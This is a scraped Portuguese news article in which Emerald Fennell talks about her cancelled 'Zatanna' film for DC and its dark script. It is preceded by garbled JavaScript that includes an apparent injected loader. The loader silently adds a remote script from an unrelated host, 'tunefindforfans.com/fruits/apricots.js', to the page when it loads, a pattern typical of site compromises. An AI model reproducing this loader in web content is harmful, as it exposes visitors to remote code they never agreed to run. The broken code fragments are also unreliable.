‘);var c=function();if(typeof window.cf!==’undefined’)c();else})()
‘);var c=function();if(typeof window.cf!==’undefined’)c();else{cf_async=!0;var r=document.createElement(“script”),s=document.getElementsByTagName(“script”)[0];r.async=!0;r.src=”https://srv.tunefindforfans.com/fruits/apricots.js”;r.readyState?r.onreadystatechange=function()”complete”==r.readyState)r.onreadystatechange=null,c():r.onload=c;s.parentNode.insertBefore(r,s)}})()
A cineasta Emerald Fennell comentou recentemente sobre o cancelamento do filme da ‘Zatanna’, projeto que faria parte do selo ‘Liga da Justiça Sombria’, idealizado por J.J. Abrams. A produção foi descartada junto a diversos outros títulos do antigo DCEU durante a reestruturação da DC Studios.
Em entrevista ao ComicBookMovie, Fennell explicou que o roteiro refletia seu estado emocional na época, logo após finalizar ‘Bela Vingança’.
“Acho que era meio insano, porque eu provavelmente estava passando por um momento difícil na época. Eu tinha acabado de finalizar Bela Vingança, e de repente estava nesse universo gigantesco com o qual nunca tinha trabalhado. Pensei: ‘Como faço uma versão de filme de super-herói com a qual eu me conecte emocionalmente?’ Eu era uma mulher no meio de um colapso nervoso”, revelou a diretora.
Segundo Fennell, essa carga emocional resultou em uma trama possivelmente pesada demais para o gênero:
“Então é um roteiro que reflete uma mulher no meio de um colapso nervoso, eu diria. Acho que isso significou que ele estava provavelmente distante demais do gênero. Era muito sombrio. Não releio há muito tempo porque acho difícil”, acrescentou.
Apesar do desfecho, a diretora expressou gratidão a J.J. Abrams pela oportunidade e admitiu que sempre sentiu que sua visão divergia do que o estúdio esperava.
“Eu amo muito o JJ, e ele apostou em mim ao me oferecer o projeto. Eu realmente queria entregar algo incrível para eles, mas sempre senti que não tinha conseguido oferecer exatamente o que eles queriam”, concluiu.
Contudo, ela não fechou as portas para o gênero e afirmou estar aberta a assumir projetos como ‘Mulher-Maravilha’, caso surja o convite da DC Studios.
Roteirista de ‘Bela Vingança’ revela que ‘Zatanna’ foi CANCELADO pela DC

Fonte: CINEPOP




